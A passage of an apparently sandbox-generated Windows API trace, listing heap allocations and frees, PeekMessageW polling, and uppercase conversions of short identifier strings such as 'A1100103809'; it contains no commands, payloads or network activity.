[0152.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0152.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0152.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0152.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0152.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0152.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0152.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4f8 [0152.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0152.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0152.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0152.038] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0152.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0152.038] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0152.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0152.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0152.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9f88 [0152.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0152.038] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0152.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0152.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa420 [0152.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2a0 [0152.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0152.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa300 [0152.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0152.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0152.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0152.038] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0152.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0152.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0152.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0152.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0152.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0152.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0152.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0152.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0152.039] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0152.039] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0152.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0152.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0152.039] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0152.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0152.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0152.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa270 [0152.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73980 [0152.039] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0152.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0152.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0152.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3f0 [0152.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa330 [0152.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0152.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa300 [0152.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0152.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0152.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0152.039] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0152.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0152.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0152.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0152.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0152.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0152.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0152.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0152.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0152.040] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0152.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0152.040] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0152.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0152.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0152.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa528 [0152.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa480 [0152.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0152.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa498 [0152.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0152.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0152.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0152.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0152.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0152.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0152.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73980 | out: hHeap=0x2af0000) returned 1 [0152.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa270 | out: hHeap=0x2af0000) returned 1 [0152.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0152.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0152.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4c8 [0152.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3c0 [0152.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0152.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa510 [0152.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0152.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0152.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0152.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0152.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0152.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0152.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0152.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0152.041] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0152.041] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0152.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0152.041] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0152.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0152.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0152.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa438 [0152.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74238 [0152.041] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0152.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0152.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa480 [0152.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa378 [0152.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0152.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2d0 [0152.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0152.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bd8 [0152.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0152.041] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0152.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0152.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0152.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0152.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0152.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0152.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0152.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0152.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0152.042] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0152.042] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0152.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa450 [0152.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa468 [0152.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0152.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2e8 [0152.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0152.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0152.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0152.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0152.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0152.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0152.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa378 [0152.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa408 [0152.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0152.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa498 [0152.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0152.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0152.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0152.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0152.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0152.042] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74238 | out: hHeap=0x2af0000) returned 1 [0152.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0152.043] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0152.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0152.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0152.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0152.043] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0152.043] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0152.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0152.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0152.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0152.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0152.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0152.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0152.043] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0152.043] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0152.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0152.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4b0 [0152.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0152.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0152.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0152.043] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0152.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0152.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa4c8 [0152.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0152.043] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0152.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0152.044] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0152.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0152.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0152.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0152.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0152.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0152.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0152.044] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0152.044] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0152.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0152.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0152.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0152.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0152.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0152.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0152.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0152.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0152.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0152.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0152.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0152.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0152.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0152.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0152.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0152.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0152.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0152.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0152.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0152.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0152.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0152.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0152.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0152.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0152.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 